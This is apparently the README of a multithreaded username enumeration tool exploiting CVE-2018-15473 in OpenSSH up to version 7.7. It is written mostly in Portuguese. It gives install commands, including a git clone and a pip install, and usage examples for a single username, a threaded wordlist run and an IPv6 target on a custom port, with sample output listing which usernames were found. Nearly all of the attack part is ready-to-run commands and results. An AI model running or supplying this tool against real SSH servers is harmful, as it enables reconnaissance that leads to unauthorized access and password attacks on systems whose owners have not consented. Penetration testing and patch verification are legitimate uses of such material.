
Enumeração de nomes de usuário multithread, com suporte a IPv6, wordlists/usuário único via CVE-2018-15473
OpenSSH até a versão 7.7 é propenso a uma vulnerabilidade de enumeração de utilizadores por não atrasar a saída para um utilizador inválido até que o pacote contendo o pedido tenha sido totalmente analisado, relacionado a auth2-gss.c, auth2-hostbased.c e auth2-pubkey.c.
Pode ser necessário instalar o pacote equivalente da sua distribuição, openssl-dev
# NOTE: if you're installing on kali, you can skip the pip install; paramiko is already there.
git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt
# - OR -
pipenv install -r requirements.txt # if you're cool like that
chmod u+x ssh-username-enum.py
Um único nome de utilizador
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!
Usar uma wordlist com 10 threads (o padrão é 4)
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------
Endereço IPv6 na porta 2222 e VERBOSIDADE AUMENTADA!
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------